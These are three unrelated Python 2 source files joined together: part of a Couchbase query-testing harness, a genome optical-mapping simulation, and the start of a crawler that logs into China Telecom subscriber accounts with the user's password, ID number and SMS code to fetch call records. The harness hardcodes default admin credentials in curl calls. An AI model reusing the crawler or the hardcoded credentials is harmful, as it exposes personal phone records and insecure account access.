# Run SQL Query
sql_result = expected_result
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
try:
self.n1ql_helper._verify_results_rqg(subquery, aggregate, sql_result=sql_result, n1ql_result=n1ql_result, hints=hints, aggregate_pushdown=self.aggregate_pushdown)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
return {"success": True, "result": "Pass"}
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
def _run_queries_and_verify_crud(self, n1ql_query=None, sql_query=None, expected_result=None, table_name=None):
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
if n1ql_query.find(self.database) <= 0:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
hints = self.query_helper._find_hints(sql_query)
for i, item in enumerate(hints):
if "simple_table" in item:
hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, scan_consistency="request_plus")
n1ql_result = actual_result["results"]
# Run SQL Query
sql_result = expected_result
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
try:
self.n1ql_helper._verify_results_crud_rqg(sql_result=sql_result, n1ql_result=n1ql_result, hints=hints)
except Exception, ex:
self.log.info(ex)
return {"success": False, "result": str(ex)}
return {"success": True, "result": "Pass"}
except Exception, ex:
return {"success": False, "result": str(ex)}
def _run_queries_with_explain(self, n1ql_query=None, indexes={}):
run_result = {}
# Run n1ql query
for index_name in indexes:
hint = "USE INDEX({0} USING {1})".format(index_name, indexes[index_name]["type"])
n1ql = self.query_helper._add_explain_with_hints(n1ql_query, hint)
self.log.info(n1ql)
message = "Pass"
check = True
fieldsnotcovered = False
if self.check_covering_index:
query = "select * from system:indexes where name = '%s'" % index_name
actual_result = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)
n1ql_result = actual_result["results"]
fields = n1ql_result[0]["indexes"]["index_key"]
fieldsnotcovered = self.query_helper.check_groupby_orderby(n1ql_query, fields)
if "NOT" in n1ql or "not" in n1ql or fieldsnotcovered and self.check_covering_index:
key = "Explain for index {0}".format(index_name)
run_result[key] = {"success": check, "result": message}
else:
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql, server=self.n1ql_server)
self.log.info(actual_result)
check = self.n1ql_helper.verify_index_with_explain(actual_result, index_name,
self.check_covering_index)
if not check:
message = " query {0} failed explain result, index {1} not found".format(n1ql_query, index_name)
self.log.info(message)
except Exception, ex:
self.log.info(ex)
message = ex
check = False
finally:
key = "Explain for index {0}".format(index_name)
run_result[key] = {"success": check, "result": message}
return run_result
def _run_explain_queries(self, n1ql_query=None, keyword ="", present=True):
run_result = {}
# Run n1ql query
n1ql = self.query_helper._add_explain_with_hints(n1ql_query)
self.log.info("Running query: " + n1ql)
message = "Pass"
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql, server=self.n1ql_server)
self.log.info(actual_result)
check = self.n1ql_helper.verify_explain(actual_result, keyword, present)
if not check:
if present:
message = " query {0} failed explain result, keyword {1} not found".format(n1ql_query, keyword)
else:
message = " query {0} failed explain result, keyword {1} was found but should not be present".format(n1ql_query, keyword)
self.log.info(message)
except Exception, ex:
self.log.info(ex)
message = ex
check = False
finally:
key = "Explain for query: {0}".format(n1ql)
run_result[key] = {"success": check, "result": message}
return run_result
def _initialize_cluster_setup(self):
if self.use_mysql:
self.log.info(" Will load directly from mysql")
self._initialize_mysql_client()
if not self.generate_input_only:
self._setup_and_load_buckets()
elif self.use_postgres:
self._initialize_postgres_client()
if not self.generate_input_only:
self._setup_and_load_buckets()
else:
self.log.info(" Will load directly from file snap-shot")
if self.populate_with_replay:
self._initialize_mysql_client()
self._setup_and_load_buckets_from_files()
self.n1ql_helper = self._initialize_n1ql_helper()
# create copy of simple table if this is a merge operation
self.sleep(10)
if self.gsi_type == "memory_optimized":
os.system("curl -X POST http://Administrator:password@{1}:8091/pools/default -d memoryQuota={0} -d indexMemoryQuota={2}".format(self.ram_quota, self.n1ql_server.ip, self.indexer_memQuota))
self.sleep(10)
if self.change_bucket_properties:
shell = RemoteMachineShellConnection(self.master)
shell.execute_command("curl -X POST -u {0}:{1} -d maxBucketCount=25 http://{2}:{3}/internalSettings".format(self.user_cluster, self.password_cluster, self.master.ip, self.master.port))
self.sleep(10, "Updating maxBucket count to 15")
self._build_indexes()
def _build_indexes(self):
self.sec_index_map = {}
fields = ['primary_key_id','bool_field1','char_field1','datetime_field1','decimal_field1',
'int_field1','varchar_field1']
if self.create_secondary_indexes:
if self.use_mysql or self.use_postgres:
self.sec_index_map = self.client._gen_index_combinations_for_tables(partitioned_indexes=self.partitioned_indexes)
else:
self.sec_index_map = self._extract_secondary_index_map_from_file(self.secondary_index_info_path)
if not self.generate_input_only:
if self.create_primary_index:
self._build_primary_indexes(self.using_gsi)
if self.create_secondary_meta_indexes:
index_name = ""
for table_name in self.sec_index_map.keys():
queries = {}
index_name = table_name
query = "CREATE INDEX {0} ON {1}(primary_key_id,bool_field1,char_field1," \
"datetime_field1," \
"decimal_field1,int_field1,varchar_field1)".format(table_name, self.database + "_" + table_name)
queries[index_name] = query
if self.create_secondary_ansi_join_indexes:
for field in fields:
index_name = table_name+"_"+field
query = "CREATE INDEX {0} ON {1}({2})".format(table_name+"_"+field, self.database+"_"+table_name, field)
queries[index_name] = query
for index_name in queries.keys():
try:
self.n1ql_helper.run_cbq_query(query=queries[index_name],
server=self.n1ql_server, verbose=False)
check = self.n1ql_helper.is_index_online_and_in_list(self.database+"_"+table_name,
index_name ,
server=self.n1ql_server,
timeout=240)
except Exception, ex:
self.log.info(ex)
if self.create_secondary_indexes and (not self.create_secondary_meta_indexes):
thread_list = []
if self.build_secondary_index_in_seq:
for table_name in self.sec_index_map.keys():
self._gen_secondary_indexes_per_table(self.database+"_"+table_name, self.sec_index_map[table_name], 0)
else:
for table_name in self.sec_index_map.keys():
t = threading.Thread(target=self._gen_secondary_indexes_per_table, args=(self.database+"_"+table_name, self.sec_index_map[table_name]))
t.daemon = True
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
def _build_primary_indexes(self, using_gsi=True):
if self.create_primary_index:
if not self.partitioned_indexes:
self.n1ql_helper.create_primary_index(using_gsi=using_gsi, server=self.n1ql_server)
else:
self.n1ql_helper.create_partitioned_primary_index(using_gsi=using_gsi, server=self.n1ql_server)
def _load_bulk_data_in_buckets_using_n1ql(self, bucket, data_set):
try:
n1ql_query = self.query_helper._builk_insert_statement_n1ql(bucket.name, data_set)
self.n1ql_helper.run_cbq_query(query=n1ql_query, server=self.n1ql_server, verbose=False)
except Exception, ex:
self.log.info('WARN=======================')
self.log.info(ex)
def _load_data_in_buckets_using_mc_bin_client_json(self, bucket, data_set):
client = VBucketAwareMemcached(RestConnection(self.master), bucket)
try:
for key in data_set.keys():
client.set(key.encode("utf8"), 0, 0, json.dumps(data_set[key]))
except Exception, ex:
self.log.info('WARN=======================')
self.log.info(ex)
def _initialize_rqg_query_helper(self):
return RQGQueryHelper()
def _initialize_n1ql_helper(self):
return N1QLHelper(version="sherlock", shell=None, max_verify=self.max_verify,
buckets=self.buckets, item_flag=None, n1ql_port=getattr(self.n1ql_server, 'n1ql_port', 8903),
full_docs_list=[], log=self.log, input=self.input, master=self.master,
database=self.database, use_rest=self.use_rest)
def _initialize_mysql_client(self):
if self.reset_database:
self.client = RQGMySQLClient(host=self.mysql_url, user_id=self.user_id, password=self.password)
if self.subquery:
path = "b/resources/rqg/{0}/database_definition/definition-subquery.sql".format(self.database)
else:
path = "b/resources/rqg/{0}/database_definition/definition.sql".format(self.database)
self.database = self.database+"_"+str(self.query_helper._random_int())
populate_data = False
if not self.populate_with_replay:
populate_data = True
if self.subquery:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=1)
else:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=self.number_of_buckets)
self._copy_table_for_merge()
else:
self.client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _initialize_postgres_client(self):
self.client = RQGPostgresClient()
self.client.reset_database_add_data()
def _copy_table_for_merge(self):
table_list = self.client._get_table_list()
reference_table = table_list[0]
if self.merge_operation:
path = "b/resources/rqg/crud_db/database_definition/table_definition.sql"
self.client.database_add_data(database=self.database, sql_file_definiton_path=path)
table_list = self.client._get_table_list()
for table_name in table_list:
if table_name != reference_table:
sql = "INSERT INTO {0} SELECT * FROM {1}".format(table_name, reference_table)
self.client._insert_execute_query(sql)
table_list = self.client._get_table_list()
for table_name in table_list:
self.client_map[table_name] = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _generate_result(self, data):
result = ""
for key in data.keys():
result +="<<<<<<<<<< TEST {0} >>>>>>>>>>> \n".format(key)
for result_key in data[key].keys():
result += "{0} :: {1} \n".format(result_key, data[key][result_key])
return result
def _gen_secondary_indexes_per_table(self, table_name="", index_map={}, sleep_time=2):
if self.partitioned_indexes:
defer_mode = str({"defer_build": "true", "num_partition":2})
else:
defer_mode = str({"defer_build": "true"})
build_index_list = []
batch_index_definitions = index_map
if self.pushdown:
table_field_map = self.client._get_field_list_map_for_tables()
fields = table_field_map['simple_table']
combination_fields = sum([map(list, combinations(fields, i)) for i in range(len(fields) + 1)], [])
for x in xrange(1, len(combination_fields)):
input = combination_fields[x]
if len(input) == 1:
fields_indexed = str(input[0])
index_name = "ix_" + str(0) + str(x)
else:
fields_indexed = str(input[0])
#TODO: this code is really weird!
for i in xrange(1, len(input)):
index_name = "ix_" + str(i) + str(x)
fields_indexed = fields_indexed+"," + str(x[i])
if self.partitioned_indexes:
query = "CREATE INDEX {0} ON {1}({2}) PARTITION BY HASH(meta().id)".format(
index_name, table_name, fields_indexed)
else:
query = "CREATE INDEX {0} ON {1}({2})".format(index_name,
table_name,
fields_indexed)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
self.n1ql_helper.is_index_online_and_in_list(table_name, index_name, server=self.n1ql_server, timeout=240)
except Exception, ex:
self.log.info(ex)
if self.dynamic_indexing:
index_name = "idx_" + table_name
query = "CREATE INDEX {0} ON {1}(DISTINCT ARRAY v FOR v IN PAIRS(SELF) END) WITH {2}".format(index_name, table_name, defer_mode)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
except Exception, ex:
self.log.info(ex)
raise
else:
for index_name in batch_index_definitions.keys():
query = "{0} WITH {1}".format(
batch_index_definitions[index_name]["definition"],
defer_mode)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
# Run Build Query
if build_index_list is not None and len(build_index_list) > 0:
batch_size = 0
end_index_batch = 0
total_indexes = 0
while total_indexes < len(build_index_list):
start_index_batch = end_index_batch
end_index_batch = min(end_index_batch+self.build_index_batch_size, len(build_index_list))
batch_size += 1
if start_index_batch == end_index_batch:
break
list_build_index_list = build_index_list[start_index_batch:end_index_batch]
total_indexes += len(list_build_index_list)
try:
build_query = "BUILD INDEX on {0}({1}) USING GSI".format(table_name, ",".join(list_build_index_list))
actual_result = self.n1ql_helper.run_cbq_query(query=build_query, server=self.n1ql_server)
self.log.info(actual_result)
self.sleep(15, "sleep after building index")
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
self.sleep(sleep_time)
def _extract_secondary_index_map_from_file(self, file_path="/tmp/index.txt"):
with open(file_path) as data_file:
return json.load(data_file)
def _generate_secondary_indexes_in_batches(self, batches):
if self.generate_input_only:
return
defer_mode = str({"defer_build": "true"})
if self.partitioned_indexes:
defer_mode = str({"defer_build": "true", "num_partition":2})
batch_index_definitions = {}
build_index_list = []
# add indexes to batch_index_definitions
for info in batches:
table_name = info["bucket"]
batch_index_definitions.update(info["indexes"])
for index_name in batch_index_definitions.keys():
query = "{0} WITH {1}".format(batch_index_definitions[index_name]["definition"], defer_mode)
query = query.replace("ON simple_table", "ON "+self.database+"_"+"simple_table")
if self.aggregate_pushdown:
query = query.replace("limit 10 offset 4", "")
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)
if index_name not in build_index_list:
build_index_list.append(index_name)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
# Run Build Query
if build_index_list is not None and len(build_index_list) > 0:
try:
build_query = "BUILD INDEX on {0}({1}) USING GSI".format(self.database+"_"+table_name, ",".join(build_index_list))
actual_result = self.n1ql_helper.run_cbq_query(query=build_query, server=self.n1ql_server)
self.log.info(actual_result)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
# Monitor till the index is built
tasks = []
try:
for info in batches:
table_name = info["bucket"]
table_name = self.database+"_"+table_name
for index_name in info["indexes"]:
if index_name in build_index_list:
tasks.append(self.async_monitor_index(bucket=table_name, index_name=index_name))
for task in tasks:
task.result()
except Exception, ex:
traceback.print_exc()
self.log.info(ex)
def async_monitor_index(self, bucket, index_name=None):
monitor_index_task = self.cluster.async_monitor_index(server=self.n1ql_server, bucket=bucket,
n1ql_helper=self.n1ql_helper, index_name=index_name)
return monitor_index_task
def are_any_indexes_present(self, index_name_list):
query_response = self.n1ql_helper.run_cbq_query("SELECT * FROM system:indexes")
current_indexes = [i['indexes']['name'] for i in query_response['results']]
for index_name in index_name_list:
if index_name in current_indexes:
return True
return False
def wait_for_index_drop(self, index_name_list):
self.with_retry(lambda: self.are_any_indexes_present(index_name_list), eval=False, delay=1, tries=30)
def with_retry(self, func, eval=True, delay=5, tries=10):
attempts = 0
while attempts < tries:
attempts = attempts + 1
res = func()
if res == eval:
return res
else:
self.sleep(delay, 'incorrect results, sleeping for %s' % delay)
raise Exception('timeout, invalid results: %s' % res)
def _drop_secondary_indexes_in_batches(self, batches):
dropped_indexes = []
for info in batches:
table_name = info["bucket"]
table_name = self.database+"_"+table_name
for index_name in info["indexes"].keys():
if index_name not in dropped_indexes:
query = "DROP INDEX {0}.{1} USING {2}".format(table_name, index_name,
info["indexes"][index_name]["type"])
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server,
query_params={'timeout': '900s'})
dropped_indexes.append(index_name)
except Exception, ex:
self.log.info("Error: " + str(ex))
self.wait_for_index_drop(info["indexes"].keys())
def _analyze_result(self, result):
check = True
failure_types = []
message = "\n ____________________________________________________\n "
for key in result.keys():
if key != "test_case_number" and key != "n1ql_query" and key != "sql_query" and key!="check_explain_plan":
check = check and result[key]["success"]
if not result[key]["success"]:
failure_types.append(key)
message += " Scenario :: {0} \n".format(key)
message += " Reason :: " + str(result[key]["result"]) + "\n"
if key == "check_explain_plan":
check = check and result[key]["success"]
if not result[key]["success"]:
failure_types.append(key)
message += " Scenario :: {0} \n".format(key)
message += " Reason :: Secondary index is not in use\n"
return check, message, failure_types
def _check_and_push_failure_record_queue(self, result, data, failure_record_queue):
if not self.record_failure:
return
for key in result.keys():
if key != "test_case_number" and key != "n1ql_query" and key != "sql_query" and not result[key]["success"]:
failure_record_queue.put(data)
def dump_failure_data(self, failure_record_queue):
if not self.record_failure:
return
import uuid
sub_dir = str(uuid.uuid4()).replace("-","")
self.data_dump_path = self.failure_record_path+"/"+sub_dir
os.mkdir(self.data_dump_path)
input_file_path = self.data_dump_path+"/input"
os.mkdir(input_file_path)
f_write_file = open(input_file_path+"/source_input_rqg_run.txt",'w')
secondary_index_path = self.data_dump_path+"/index"
os.mkdir(secondary_index_path)
database_dump = self.data_dump_path+"/db_dump"
os.mkdir(database_dump)
f_write_index_file = open(secondary_index_path+"/secondary_index_definitions.txt",'w')
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
client.dump_database(data_dump_path=database_dump)
client._close_connection()
f_write_index_file.write(json.dumps(self.sec_index_map))
f_write_index_file.close()
while not failure_record_queue.empty():
f_write_file.write(json.dumps(failure_record_queue.get())+"\n")
f_write_file.close()
def unzip_template(self, template_path):
if "zip" not in template_path:
return template_path
tokens = template_path.split("/")
file_name = tokens[len(tokens)-1]
output_path = template_path.replace(file_name, "")
with zipfile.ZipFile(template_path, "r") as z:
z.extractall(output_path)
template_path = template_path.replace(".zip", "")
return template_path
def _setup_and_load_buckets_from_files(self):
bucket_list = []
#Unzip the files and get bucket list
tokens = self.db_dump_path.split("/")
data_file_path = self.db_dump_path.replace(tokens[len(tokens)-1], "data_dump")
os.mkdir(data_file_path)
with zipfile.ZipFile(self.db_dump_path, "r") as z:
z.extractall(data_file_path)
onlyfiles = [f for f in listdir(data_file_path) if isfile(join(data_file_path, f))]
for file in onlyfiles:
bucket_list.append(file.split(".")[0])
# Remove any previous buckets
for bucket in self.buckets:
self.rest.delete_bucket(bucket.name)
self.buckets = []
# Create New Buckets
self._create_buckets(self.master, bucket_list, server_id=None, bucket_size=None)
# Wait till the buckets are up
self.sleep(15)
# Read Data from mysql database and populate the couchbase server
for bucket_name in bucket_list:
for bucket in self.buckets:
if bucket.name == bucket_name:
file_path = data_file_path+"/"+bucket_name+".txt"
with open(file_path) as data_file:
data = json.load(data_file)
self._load_data_in_buckets_using_mc_bin_client_json(bucket, data)
if self.populate_with_replay:
for key in data.keys():
insert_sql = self.query_helper._generate_insert_statement_from_data(bucket_name, data[key])
self.client._insert_execute_query(insert_sql)
shutil.rmtree(data_file_path, ignore_errors=True)
def fill_advise_dict(self, bucket_list=[]):
for bucket in bucket_list:
if bucket not in self.advise_dict.keys():
self.advise_dict[bucket] = self.advise_buckets[0]
self.advise_buckets.remove(self.advise_buckets[0])
def _setup_and_load_buckets(self):
# Remove any previous buckets
if self.skip_setup_cleanup:
for bucket in self.buckets:
self.rest.delete_bucket(bucket.name)
self.buckets = []
if self.change_bucket_properties or self.gsi_type == "memory_optimized":
bucket_size = 100
else:
bucket_size = None
if self.change_bucket_properties:
shell = RemoteMachineShellConnection(self.master)
shell.execute_command("curl -X POST -u {0}:{1} -d maxBucketCount=25 http://{2}:{3}/internalSettings".format(self.user_cluster, self.password_cluster, self.master.ip, self.master.port))
self.sleep(10, "Updating maxBucket count to 25")
# Pull information about tables from mysql database and interpret them as no-sql dbs
table_key_map = self.client._get_primary_key_map_for_tables()
# Make a list of buckets that we want to create for querying
bucket_list = table_key_map.keys()
self.log.info("database used is {0}".format(self.database))
new_bucket_list = []
for bucket in bucket_list:
if bucket.find("copy_simple_table") > 0:
new_bucket_list.append(self.database+"_"+"copy_simple_table")
else:
new_bucket_list.append(self.database + "_" + bucket)
if self.subquery:
break
# Create New Buckets
self.fill_advise_dict(new_bucket_list)
self._create_buckets(self.master, new_bucket_list, server_id=None, bucket_size=bucket_size)
self.log.info("buckets created")
# Wait till the buckets are up
self.sleep(5)
self.buckets = self.rest.get_buckets()
self.newbuckets = []
for bucket in self.buckets:
if bucket.name in new_bucket_list:
self.newbuckets.append(bucket)
self.log.info("safe to start another job")
self.record_db = {}
self.buckets = self.newbuckets
# Read Data from mysql database and populate the couchbase server
for bucket_name in bucket_list:
query = "select * from {0}".format(bucket_name)
columns, rows = self.client._execute_query(query=query)
self.record_db[bucket_name] = self.client._gen_json_from_results_with_primary_key(columns, rows, primary_key=table_key_map[bucket_name])
if self.subquery:
for bucket in self.newbuckets:
if bucket.name == self.database+"_"+bucket_name:
self.load_subquery_test_data(bucket)
else:
for bucket in self.newbuckets:
if bucket.name == self.database+"_"+bucket_name:
self._load_bulk_data_in_buckets_using_n1ql(bucket, self.record_db[bucket_name])
def _populate_delta_buckets(self, table_name = "simple_table"):
if table_name != "simple_table":
client = self.client_map[table_name]
else:
client = self.client
query = "delete from {0} where primary_key_id is not null".format(table_name)
client._insert_execute_query(query=query)
query = "delete from {0} where primary_key_id is not null".format(self.database+"_"+table_name)
self.n1ql_query_runner_wrapper(n1ql_query=query, server=self.n1ql_server, verbose=True)
insert_sql = "insert into {0}(KEY k ,VALUE b) SELECT meta(b).id as k, b from {1} b where primary_key_id is not null".format(self.database+"_"+table_name,self.database+"_"+"copy_simple_table")
if self.use_advisor:
self.create_secondary_index("SELECT meta(b).id as k, b from {0} b where primary_key_id is not null".format(self.database+"_"+"copy_simple_table"))
try:
self.log.info("n1ql query is {0}".format(insert_sql))
self.n1ql_helper.run_cbq_query(query=insert_sql, server=self.n1ql_server, verbose=True)
insert_sql = "INSERT INTO {0} SELECT * FROM copy_simple_table".format(table_name)
client._insert_execute_query(insert_sql)
except Exception, ex:
self.log.info(ex)
def load_subquery_test_data(self, bucket):
query = 'select primary_key_id from simple_table_1'
result = self.client._execute_sub_query(query)
primary_key_values = result
query = 'CREATE TABLE IF NOT EXISTS {0}.`simple_table_2` ' \
'(`order_id` VARCHAR(100) NOT NULL,`qty` INT(11) NULL DEFAULT NULL,`productId` VARCHAR(1000) NOT NULL' \
',`price` DECIMAL(10,0) NOT NULL,`primary_key_id` VARCHAR(100) NOT NULL,PRIMARY KEY (`order_id`),' \
'FOREIGN KEY (`primary_key_id`) REFERENCES `simple_table_1`(`primary_key_id`))'.format(self.database)
self.client._db_execute_query(query)
for primary_key_value in primary_key_values:
query = 'select varchar_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
varchar_field = result
query = 'select decimal_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
decimal_field_value = result
query = 'select int_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
int_field_value = result
query = 'select datetime_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
datetime_field_value = result
query = 'select bool_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
bool_field_value = bool(result)
query = 'select varchar_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
varchar_value = result
query = 'select char_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
char_value = result
orderid1 = "order-" + varchar_field
orderid2 = "order-" + str(self.query_helper._random_char()) + "_"+str(self.query_helper._random_int()) + varchar_field
price1 = self.query_helper._random_float()+10
price2 = self.query_helper._random_float()+100
qty1 = self.query_helper._random_int()
qty2 = self.query_helper._random_int()
query = 'insert into simple_table_2 (order_id, qty, productId, price, primary_key_id) values ("%s", %s, "snack", %s, %s)' % (orderid1, qty1, price1, primary_key_value)
self.client._insert_execute_query(query)
query = 'insert into simple_table_2 (order_id, qty, productId, price, primary_key_id) values ("%s", %s, "lunch", %s, %s)' % (orderid2, qty2, price2, primary_key_value)
self.client._insert_execute_query(query)
n1ql_insert_template = 'INSERT INTO %s (KEY, VALUE) VALUES ' \
'("%s", {"primary_key_id": "%s" ,"decimal_field1":%s,"int_field1":%s,' \
'"datetime_field1":"%s","bool_field1":%s,"varchar_field1":"%s",' \
'"char_field1":"%s","simple_table_2":[{"order_id":"%s","qty":%s,' \
'"productId":"snack","price":%s,"primary_key_id":"%s"},' \
'{"order_id":"%s","qty":%s,"productId":"lunch","price":%s,' \
'"primary_key_id":"%s"}] } )'\
% (bucket.name,primary_key_value, primary_key_value, decimal_field_value,
int_field_value, datetime_field_value, bool_field_value, varchar_value,
char_value, orderid1, qty1, price1, primary_key_value, orderid2, qty2,
price2, primary_key_value)
self.n1ql_helper.run_cbq_query(query=n1ql_insert_template, server=self.n1ql_server)
|
single_sim.py
|
from multiprocessing import Queue, Process
import time
from bnx import BNX
from false_sites import FalseSites
from molecule_generator import MoleculeGenerator, Molecule
from optical_variation import OpticalVariation
from optics import Optics
class SingleSim:
def __init__(self, args, bnx_path, genome, irate, erange, vmiss, stretch_factor, sizing, pulse_sigma):
self.args = args
self.bnx_path = bnx_path
self.genome = genome
self.iterations = args.iterations
self.m_generator = MoleculeGenerator(bnx_path, self.genome, 1)
self.irate = irate
self.erange = erange
self.vmiss = float("%.2f" % vmiss)
self.sf = stretch_factor
self.sizing = sizing
self.p_sigma = pulse_sigma
self.p_dist,self.p_sites = self.processFull()
"""
Simulation is performed self.iterations times, each by separate process.
"""
def processFull(self):
pt = None
ps = None
queue = Queue()
procs = [Process(target=self.processOne, args=(queue,)) for i in range(self.iterations)]
results = []
processed = 0
p_id = 0
num_pids = self.args.procs
pid_start = p_id
        pid_end = min(p_id + num_pids, self.iterations)
while processed < self.iterations:
for i in range(pid_start, pid_end):
procs[i].start()
for i in range(pid_start, pid_end):
results.append(queue.get())
for i in range(pid_start, pid_end):
procs[i].join()
processed += pid_end - pid_start
pid_start = pid_end
pid_end += num_pids
if pid_end > self.iterations:
pid_end = self.iterations
for value_pair in results:
ti = value_pair[0]
            if pt is None:
pt = ti
else:
for i in range(self.args.dist_max_len):
pt[i] += ti[i]
for value_pair in results:
si = value_pair[1]
            if ps is None:
ps = si
else:
for i in range(self.args.sites_max_len):
ps[i] += si[i]
m = []
for _, _, mols in results:
m += mols
if self.args.generate_bnx:
BNX.ToBNX(self.bnx_path.replace(".bnx","_generated.bnx"), m)
for i in range(self.args.dist_max_len):
pt[i] = pt[i] / self.iterations
for i in range(self.args.sites_max_len):
ps[i] = ps[i] / self.iterations
return (pt,ps)
def processOne(self, queue):
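        # One simulation pass: generate molecules from the reference genome (sex
        # chosen by dataset name), inject false label sites, apply optical
        # sizing/pulse noise, apply the stretch factor, then push the resulting
        # (distribution, site counts, molecules) tuple onto the queue.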
#bionano dataset specific setting
if "GM09888" in self.bnx_path or "GM11428" in self.bnx_path or "GM24143" in self.bnx_path:
molecules = self.m_generator.generate(self.erange, self.vmiss, "female")
else:
molecules = self.m_generator.generate(self.erange, self.vmiss, "male")
ins = FalseSites(self.irate, self.genome)
ins.processOne(molecules)
optics = Optics(molecules, 375, self.sizing, self.p_sigma)
optics.processOne()
sf = OpticalVariation(molecules, self.sf)
p_result = sf.processOne()
#bionano dataset specific setting
if "GM24149" in self.bnx_path or "GM24143" in self.bnx_path or "GM24385" in self.bnx_path:
queue.put((p_result, self.m_generator.sitesDist(molecules, False), molecules))
else:
queue.put((p_result, self.m_generator.sitesDist(molecules, True), molecules))
|
main.py
|
# -*- coding: utf-8 -*-
import re
import json
import urllib
import time
import traceback
import calendar
import sys
import datetime
import random
# The next two lines work around encoding errors when handling Chinese text
reload(sys)
sys.setdefaultencoding("utf8")
from Queue import Queue
from threading import Thread
import threading
from datetime import date
from dateutil.relativedelta import relativedelta
if __name__ == '__main__':
sys.path.append('../..')
sys.path.append('../../..')
sys.path.append('../../../..')
from base_crawler import BaseCrawler
from crawler.china_telecom_tool import login_unity
else:
from worker.crawler.base_crawler import BaseCrawler
from worker.crawler.china_telecom_tool import login_unity
class Crawler(BaseCrawler):
"""
kwargs 包含
'tel': str,
'pin_pwd': str,
'id_card': str,
'full_name': unicode,
'sms_code': str,
'captcha_code': str
錯誤等級
0: 成功
1: 帳號密碼錯誤
2: 認證碼錯誤
9: 其他錯誤
"""
def __init__(self, **kwargs):
"""
初始化
"""
super(Crawler, self).__init__(**kwargs)
        # Flag used to record call-detail pages whose fields do not map as expected
self.flag = False
def need_parameters(self, **kwargs):
return ['pin_pwd', 'sms_verify']
def get_verify_type(self, **kwargs):
return 'SMS'
def login(self, **kwargs):
ProvinceID = '02'
code, key = login_unity(self, ProvinceID, **kwargs)
if code != 0:
return code, key
cookie_url ="http://www.189.cn/login/skip/ecs.do?method=skip&platNo=93507&toStUrl=http://service.sh.189.cn/service/query/detail"
code, key, cookie_req = self.get(cookie_url)
return code, key
def send_verify_request(self, **kwargs):
"""
請求發送短信,或是下載圖片,或是同時發送請求
return
status_key: str, 狀態碼金鑰,參考status_code
level: int, 錯誤等級
message: unicode, 詳細的錯誤信息
image_str: str, Captcha圖片的base64字串, SMS則回空
